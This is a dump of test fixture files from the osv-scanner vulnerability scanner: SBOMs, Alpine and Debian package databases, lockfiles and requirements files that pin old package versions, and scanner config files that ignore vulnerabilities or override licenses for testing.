cpe:2.3:a:busybox_binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 8192 busybox /bin/sh cmd:sh=1.36.1-r27 Q1miWwyhWKXVEiRYLhmArV1TKMs6A= busybox=1.36.1-r27 1547 Natanael Copa <ncopa@alpinelinux.org> ca-certificates-bundle 20220614-r4 Pre generated bundle of Mozilla certificates MPL-2.0 MIT cpe:2.3:a:ca-certificates-bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* pkg:apk/alpine/ca-certificates-bundle@20220614-r4?arch=x86_64&upstream=ca-certificates&distro=alpine-3.17.2 https://www.mozilla.org/en-US/about/governance/policies/security-group/certs/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ca-certificates-bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e1839fd45a096c9e21ac24f8a61991d357d11628 237568 ca-certificates ca-certificates-cacert=20220614-r4 Q14PFUzkDXTGDcHkiuEdFuzb+EvxQ= 126296 Natanael Copa <ncopa@alpinelinux.org> libc-utils 0.7.2-r3 Meta package to pull in correct libc BSD-2-Clause BSD-3-Clause cpe:2.3:a:libc-utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* pkg:apk/alpine/libc-utils@0.7.2-r3?arch=x86_64&upstream=libc-dev&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:libc-utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc_utils:0.7.2-r3:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 60424133be2e79bbfeff3d58147a22886f817ce2 4096 libc-dev Q19Gg06pBPiiG9UN94ql7qImsHSUQ= musl-utils 1485 Ariadne Conill <ariadne@dereferenced.org> libcrypto3 3.0.8-r0 Crypto library from openssl Apache-2.0 cpe:2.3:a:libcrypto3:libcrypto3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libcrypto3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 4206592 openssl so:libcrypto.so.3=3 Q1lyWpurYeMlLEt60ys+OlTABmzgs= so:libc.musl-x86_64.so.1 1710217 Ariadne Conill <ariadne@dereferenced.org> libssl3 3.0.8-r0 SSL shared libraries Apache-2.0 cpe:2.3:a:libssl3:libssl3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libssl3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 622592 openssl so:libssl.so.3=3 Q1Z6/d/FKYkPehWzNtOtYnJ74oIkY= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 246853 Timo Teräs <timo.teras@iki.fi> musl 1.2.3-r4 the musl c library (libc) implementation MIT cpe:2.3:a:musl:musl:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 634880 musl so:libc.musl-x86_64.so.1=1 Q1Pk7x1woArbB1nzkMPJPq1TECwus= 388955 Timo Teräs <timo.teras@iki.fi> musl-utils 1.2.3-r4 the musl c library (libc) implementation MIT BSD-2-Clause GPL-2.0-or-later cpe:2.3:a:musl-utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl-utils@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:musl-utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl_utils:1.2.3-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 135168 musl cmd:getconf=1.2.3-r4 cmd:getent=1.2.3-r4 cmd:iconv=1.2.3-r4 cmd:ldconfig=1.2.3-r4 cmd:ldd=1.2.3-r4 Q1ZWJL4eySx8nPSjF1FAJgQyvuNs4= scanelf so:libc.musl-x86_64.so.1 36697 Natanael Copa <ncopa@alpinelinux.org> scanelf 1.3.5-r1 Scan ELF binaries for stuff GPL-2.0-only cpe:2.3:a:scanelf:scanelf:1.3.5-r1:*:*:*:*:*:*:* pkg:apk/alpine/scanelf@1.3.5-r1?arch=x86_64&upstream=pax-utils&distro=alpine-3.17.2 https://wiki.gentoo.org/wiki/Hardened/PaX_Utilities apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e52243dbb02069f10d48440ccc5fd41fa5fc2236 98304 pax-utils cmd:scanelf=1.3.5-r1 Q11dxYFsHvBFAzzHGDo5gOTDNJDyQ= so:libc.musl-x86_64.so.1 37687 Sören Tempel <soeren+alpine@soeren-tempel.net> ssl_client 1.36.1-r27 EXternal ssl_client for busybox wget GPL-2.0-only cpe:2.3:a:ssl-client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/ssl_client@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ssl-client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl_client:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 28672 busybox cmd:ssl_client=1.36.1-r27 Q1QuqZjeP6XG85I29tOiCWofL8Cj0= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 4929 Natanael Copa <ncopa@alpinelinux.org> zlib 1.2.13-r0 A compression/decompression Library Zlib cpe:2.3:a:zlib:zlib:1.2.13-r0:*:*:*:*:*:*:* pkg:apk/alpine/zlib@1.2.13-r0?arch=x86_64&upstream=zlib&distro=alpine-3.17.2 https://zlib.net/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bb37266b06a72d21d1fd850ef4b86665cf9ef70f 110592 zlib so:libz.so.1=1.2.13 Q1rjnXT01l1PAxXheUxe4Oldl5rFk= so:libc.musl-x86_64.so.1 54258 alpine 3.17.2 Alpine Linux v3.17 https://gitlab.alpinelinux.org/alpine/aports/-/issues https://alpinelinux.org/ alpine Alpine Linux v3.17 3.17.2 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many-with-insecure/installed ================================================ C:Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= P:apk-tools V:2.12.10-r1 A:x86_64 S:120973 I:307200 T:Alpine Package Keeper - package manager for alpine U:https://gitlab.alpinelinux.org/alpine/apk-tools L:GPL-2.0-only o:apk-tools m:Natanael Copa t:1666552494 c:0188f510baadbae393472103427b9c1875117136 D:musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 p:so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 F:etc F:etc/apk F:etc/apk/keys F:etc/apk/protected_paths.d F:lib R:libapk.so.3.12.0 a:0:0:755 Z:Q1opjpYqXgzmOVo7EbNe8l5Xol08g= F:lib/apk F:lib/apk/exec F:sbin R:apk a:0:0:755 Z:Q1/4bmOPe/H1YhHRzlrj27oufThMw= F:var F:var/lib F:var/lib/apk ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many-with-insecure/not-a-lockfile.toml ================================================ _="whatever this is, it's not a lockfile!" ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many-with-insecure/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many-with-insecure/replace-local.mod ================================================ require ( golang.org/x/net v1.2.3 ) replace ( golang.org/x/net v1.2.3 => ./fork/net ) ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many-with-insecure/status ================================================ Package: adduser Status: install ok installed Priority: important Section: admin Installed-Size: 849 Maintainer: redacted Architecture: all Multi-Arch: foreign Version: 3.118 Depends: passwd, debconf (>= 0.5) | debconf-2.0 Suggests: liblocale-gettext-perl, perl Conffiles: /etc/deluser.conf 773fb95e98a27947de4a95abb3d3f2a2 Description: add and remove users and groups This package includes the 'adduser' and 'deluser' commands for creating and removing users. . - 'adduser' creates new users and groups and adds existing users to existing groups; - 'deluser' removes users and groups and removes users from a given group. . Adding users with 'adduser' is much easier than adding them manually. Adduser will choose appropriate UID and GID values, create a home directory, copy skeletal user configuration, and automate setting initial values for the user's password, real name and so on. . Deluser can back up and remove users' home directories and mail spool or all the files they own on the system. . A custom script can be executed after each of the commands. ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-none/README.md ================================================ this directory has no lockfiles at all! (but the nested one does ;) ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-requirements/my-requirements.txt ================================================ flask==1.0.0 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-requirements/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-requirements/requirements-dev.txt ================================================ black==25.1.0 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-requirements/requirements-transitive.txt ================================================ numpy==2.3.1 -r requirements.txt ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-requirements/requirements.prod.txt ================================================ django==2.2.24 # via # -r requirements.in # django-debug-toolbar # django-filter # django-storages # easy-thumbnails ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-requirements/requirements.txt ================================================ flask==1.0.0 django==1.11.29 requests==2.20.0 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-requirements/the_requirements_for_test.txt ================================================ numpy==2.3.1 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-requirements/unresolvable-requirements.txt ================================================ flask==1.0.0 flask-cors==1.0.0 pandas==0.23.4 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-scalibr/Package.resolved ================================================ { "pins" : [ { "identity" : "swift-algorithms", "kind" : "remoteSourceControl", "location" : "https://github.com/apple/swift-algorithms.git", "state" : { "revision" : "b14b7f4c528c942f121c8b860b9410b2bf57825e", "version" : "1.0.0" } }, { "identity" : "swift-async-algorithms", "kind" : "remoteSourceControl", "location" : "https://github.com/apple/swift-async-algorithms.git", "state" : { "revision" : "9cfed92b026c524674ed869a4ff2dcfdeedf8a2a", "version" : "0.1.0" } }, { "identity" : "swift-atomics", "kind" : "remoteSourceControl", "location" : "https://github.com/apple/swift-atomics.git", "state" : { "revision" : "6c89474e62719ddcc1e9614989fff2f68208fe10", "version" : "1.1.0" } } ], "version" : 2 } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-scalibr/cabal.project.freeze ================================================ constraints: any.AC-Angle ==1.0, any.ALUT ==2.4.0.3, any.ANum ==0.2.0.2, any.Agda ==2.6.4.3, transformers-base +orphaninstances, any.Allure ==0.11.0.0, any.biscuit-haskell ==0.3.0.0, ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-scalibr/depsjson ================================================ { "runtimeTarget": { "name": ".NETCoreApp,Version=v6.0", "signature": "" }, "compilationOptions": {}, "targets": { ".NETCoreApp,Version=v6.0": { "TestLibrary/1.0.0": { "dependencies": { "Microsoft.Extensions.DependencyInjection": "6.0.0", "Microsoft.Extensions.Logging": "6.0.0", "Newtonsoft.Json": "13.0.1", "Serilog": "2.10.0", "Serilog.Sinks.Console": "4.0.1", "TestCommon": "1.0.0" }, "runtime": { "TestLibrary.dll": {} } }, "AWSSDK.Core/3.7.10.6": { "runtime": { "lib/netcoreapp3.1/AWSSDK.Core.dll": { "assemblyVersion": "3.3.0.0", "fileVersion": "3.7.10.6" } } }, "Microsoft.Extensions.DependencyInjection/6.0.0": { "dependencies": { "Microsoft.Extensions.DependencyInjection.Abstractions": "6.0.0", "System.Runtime.CompilerServices.Unsafe": "6.0.0" }, "runtime": { "lib/net6.0/Microsoft.Extensions.DependencyInjection.dll": { "assemblyVersion": "6.0.0.0", "fileVersion": "6.0.21.52210" } } } } }, "libraries": { "TestLibrary/1.0.0": { "type": "project", "serviceable": false, "sha512": "" }, "AWSSDK.Core/3.7.10.6": { "type": "package", "serviceable": true, "sha512": "sha512-kHBB+QmosVaG6DpngXQ8OlLVVNMzltNITfsRr68Z90qO7dSqJ2EHNd8dtBU1u3AQQLqqFHOY0lfmbpexeH6Pew==", "path": "awssdk.core/3.7.10.6", "hashPath": "awssdk.core.3.7.10.6.nupkg.sha512" }, "Microsoft.Extensions.DependencyInjection/6.0.0": { "type": "package", "serviceable": true, "sha512": "sha512-k6PWQMuoBDGGHOQTtyois2u4AwyVcIwL2LaSLlTZQm2CYcJ1pxbt6jfAnpWmzENA/wfrYRI/X9DTLoUkE4AsLw==", "path": "microsoft.extensions.dependencyinjection/6.0.0", "hashPath": "microsoft.extensions.dependencyinjection.6.0.0.nupkg.sha512" }, "System.Linq.Dynamic.Core/1.3.7": { "type": "package", "serviceable": true, "sha512": "sha512-7J9oS95JCcyOtnKCr0tYUOMAj67Ee3WKal6li20vEeuQFdD7C4XuAABysp3H5dx+wmHkXuUNoxW3+U+OEsx+JQ==", "path": "system.linq.dynamic.core/1.3.7", "hashPath": "system.linq.dynamic.core.1.3.7.nupkg.sha512" } } } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-scalibr/gems.locked ================================================ PATH remote: .. specs: rubydns (2.0.2) async-dns (~> 1.0) GEM remote: https://rubygems.org/ specs: async (2.23.0) console (~> 1.29) fiber-annotation io-event (~> 1.9) metrics (~> 0.12) traces (~> 0.15) async-dns (1.4.1) async io-endpoint async-http (0.87.0) async (>= 2.10.2) async-pool (~> 0.9) io-endpoint (~> 0.14) io-stream (~> 0.6) metrics (~> 0.12) protocol-http (~> 0.49) protocol-http1 (~> 0.30) protocol-http2 (~> 0.22) traces (~> 0.10) async-pool (0.10.3) async (>= 1.25) console (1.29.2) fiber-annotation fiber-local (~> 1.1) json fiber-annotation (0.2.0) fiber-local (1.1.0) fiber-storage fiber-storage (1.0.0) geoip (1.6.4) io-endpoint (0.15.1) io-event (1.9.0) io-stream (0.6.1) json (2.10.1) metrics (0.12.1) nokogiri (1.18.2-arm64-darwin) racc (~> 1.4) nokogiri (1.18.2-x86_64-linux-gnu) racc (~> 1.4) process-daemon (1.0.1) rainbow (~> 2.0) protocol-hpack (1.5.1) protocol-http (0.49.0) protocol-http1 (0.30.0) protocol-http (~> 0.22) protocol-http2 (0.22.1) protocol-hpack (~> 1.4) protocol-http (~> 0.47) racc (1.8.1) rainbow (2.2.2) rake rake (13.2.1) traces (0.15.2) PLATFORMS arm64-darwin-21 x86_64-linux DEPENDENCIES async-http geoip nokogiri process-daemon rubydns! BUNDLED WITH 2.6.2 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-scalibr/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-scalibr/packages.config ================================================ ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-scalibr/packages.lock.json ================================================ { "version": 1, "dependencies": { "net8.0": { "Newtonsoft.Json": { "type": "Direct", "requested": "[13.0.3, )", "resolved": "13.0.3", "contentHash": "HrC5BXdl00IP9zeV+0Z848QWPAoCr9P3bDEZguI+gkLcBKAOxix/tLEAAHC+UvDNPv4a2d18lOReHMOagPa+zQ==" } } } } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-test-ignore/osv-scanner-test.toml ================================================ [[IgnoredVulns]] id = "CVE-2021-23424" reason = "Test manifest file (package-lock.json)" ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-test-ignore/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/maven-transitive/abc.xml ================================================ 4.0.0 com.mycompany.app my-app 1.0.0 my-app http://www.example.com org.apache.logging.log4j log4j-web 2.14.1 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/maven-transitive/encoding.xml ================================================ 4.0.0 com.mycompany.app my-app 1.0.0 my-app http://www.example.com junit junit 4.12 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/maven-transitive/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/maven-transitive/parent.xml ================================================ 4.0.0 com.mycompany.app parent 1.0.0 my-app pom com.google.android.gms play-services 10.0.0 google-android https://dl.google.com/dl/android/maven2 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/maven-transitive/pom.xml ================================================ 4.0.0 com.mycompany.app my-app 1.0.0 my-app http://www.example.com org.apache.logging.log4j log4j-web 2.14.1 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/maven-transitive/registry.xml ================================================ 4.0.0 com.mycompany.app my-app 1.0.0 my-app com.mycompany.app parent 1.0.0 ./parent.xml org.apache.logging.log4j log4j-web 2.14.1 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-call-analysis-config.toml ================================================ [[PackageOverrides]] name = "stdlib" reason = "Just want to test actual packages" ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-complex-licenses-config.toml ================================================ [[PackageOverrides]] ecosystem = "npm" ignore = true license.override = ["0BSD"] [[PackageOverrides]] ecosystem = "Packagist" license.override = ["0BSD"] [[PackageOverrides]] ecosystem = "Alpine" name = "musl" license.override = ["UNKNOWN"] [[PackageOverrides]] ecosystem = "Alpine" name = "musl-utils" license.ignore = true # this takes priority over license.override license.override = ["UNKNOWN"] [[PackageOverrides]] ecosystem = "Alpine" name = "apk-tools" license.ignore = false [[PackageOverrides]] ecosystem = "Alpine" license.ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-composite-config.toml ================================================ [[PackageOverrides]] ecosystem = "npm" ignore = true [[PackageOverrides]] name = "https://github.com/brendan-duncan/archive.git" vulnerability.ignore = true [[PackageOverrides]] ecosystem = "Maven" ignore = true reason = "it makes the table output really really long" [[PackageOverrides]] ecosystem = "Packagist" license.override = ["0BSD"] [[PackageOverrides]] ecosystem = "Alpine" license.override = ["MIT"] ================================================ FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-duplicate-config.toml ================================================ [[IgnoredVulns]] id = "GO-2022-0274" ignoreuntil = 2020-01-01 [[IgnoredVulns]] id = "GO-2022-0274" ignoreuntil = 2022-01-01 [[IgnoredVulns]] id = "GHSA-whgm-jr23-g3j9" [[IgnoredVulns]] id = "CVE-2025-26519" ================================================ FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-empty-config.toml ================================================ # An empty config file to override the ignore config ================================================ FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-expressive-licenses-config.toml ================================================ [[PackageOverrides]] name = "babel" license.override = ["MIT AND (LGPL-2.1-or-later OR BSD-3-Clause)"] [[PackageOverrides]] name = "human-signals" license.override = ["LGPL-2.1-only OR MIT OR BSD-3-Clause"] [[PackageOverrides]] name = "ms" license.override = ["MIT WITH Bison-exception-2.2"] ================================================ FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-invalid-licenses-config.toml ================================================ [[PackageOverrides]] name = "babel" license.override = ["MIT AND (LGPL-2.1-or-later OR BSD-3-Clause))"] [[PackageOverrides]] name = "human-signals" license.override = ["LGPL-2.1-only OR OR BSD-3-Clause"] [[PackageOverrides]] name = "ms" license.override = ["MIT WITH (Bison-exception-2.2 AND somethingelse)"] ================================================ FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-partial-ignores-config.toml ================================================ [[IgnoredVulns]] id = "CVE-2025-26519" # in alpine.cdx.xml [[IgnoredVulns]] id = "CVE-2018-25032" # in alpine.cdx.xml [[IgnoredVulns]] id = "GO-2022-0274" # in postgres-stretch.cdx.xml [[IgnoredVulns]] id = "CVE-2019-5188" ignoreUntil = 2020-01-01 [[IgnoredVulns]] id = "CVE-2022-1304" ignoreUntil = 2100-01-01 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-reasonless-ignores-config.toml ================================================ [[IgnoredVulns]] id = "GHSA-whgm-jr23-g3j9" [[PackageOverrides]] ecosystem = "Packagist" ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-unknown-config.toml ================================================ RustVersionOverride = "1.2.3" [[PackageOverrides]] ecosystem = "npm" skip = true license.override = ["0BSD"] [[PackageOverrides]] ecosystem = "Packagist" license.override = ["0BSD"] [[PackageOverrides]] ecosystem = "Alpine" Name = "musl" license.override = ["UNKNOWN"] [[PackageOverrides]] ecosystem = "Alpine" name = "musl-utils" license.skip = true [[IgnoredVulns]] id = "GO-2022-0274" ignoreuntil = 2020-01-01 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/sbom-insecure/alpine-zlib-16.cdx.json ================================================ { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "metadata": { "timestamp": "2025-07-08T05:23:38Z", "tools": { "components": [ { "type": "application", "name": "SCALIBR", "externalReferences": [ { "url": "https://github.com/google/osv-scalibr", "type": "website" } ] } ] }, "authors": [ {} ], "component": { "bom-ref": "a5add6de-55de-40a9-aa0d-1f03de5ab308", "type": "", "name": "" } }, "components": [ { "bom-ref": "6756e583-83d8-4a08-a573-d2e9506cbd93", "type": "library", "name": "zlib", "version": "1.2.12-r1", "purl": "pkg:apk/alpine/zlib@1.2.12-r1?arch=x86_64\u0026distro=3.22.0\u0026origin=zlib", "evidence": { "occurrences": [ { "location": "lib/apk/db/installed" } ] } } ] } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/sbom-insecure/alpine.cdx.xml ================================================ 2023-03-02T12:04:22+11:00 anchore syft 0.73.0 alpine:latest sha256:fd6275a37d2472b9d3be70c3261087b8d65e441c21342ae7313096312bcda2b3 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 331776 alpine-baselayout Q1/eXfmbYT1WXenFSqKjroYyK84NE= alpine-baselayout-data=3.4.0-r0 /bin/sh 8890 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout-data 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout-data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout-data@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout-data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 77824 alpine-baselayout Q1/JgpM8J6DWI/541tUX+uHEzSjqo= 11664 Natanael Copa <ncopa@alpinelinux.org> alpine-keys 2.4-r1 Public keys for Alpine Linux packages MIT cpe:2.3:a:alpine-keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* pkg:apk/alpine/alpine-keys@2.4-r1?arch=x86_64&upstream=alpine-keys&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_keys:2.4-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed aab68f8c9ab434a46710de8e12fb3206e2930a59 159744 alpine-keys Q1KM01lfKVp+gEZn23awujqjSkrN8= 13361 Natanael Copa <ncopa@alpinelinux.org> apk-tools 2.12.10-r1 Alpine Package Keeper - package manager for alpine GPL-2.0-only cpe:2.3:a:apk-tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* pkg:apk/alpine/apk-tools@2.12.10-r1?arch=x86_64&upstream=apk-tools&distro=alpine-3.17.2 https://gitlab.alpinelinux.org/alpine/apk-tools apkdb-cataloger ApkMetadata apk cpe:2.3:a:apk-tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk_tools:2.12.10-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 0188f510baadbae393472103427b9c1875117136 307200 apk-tools so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= musl>=1.2 ca-certificates-bundle 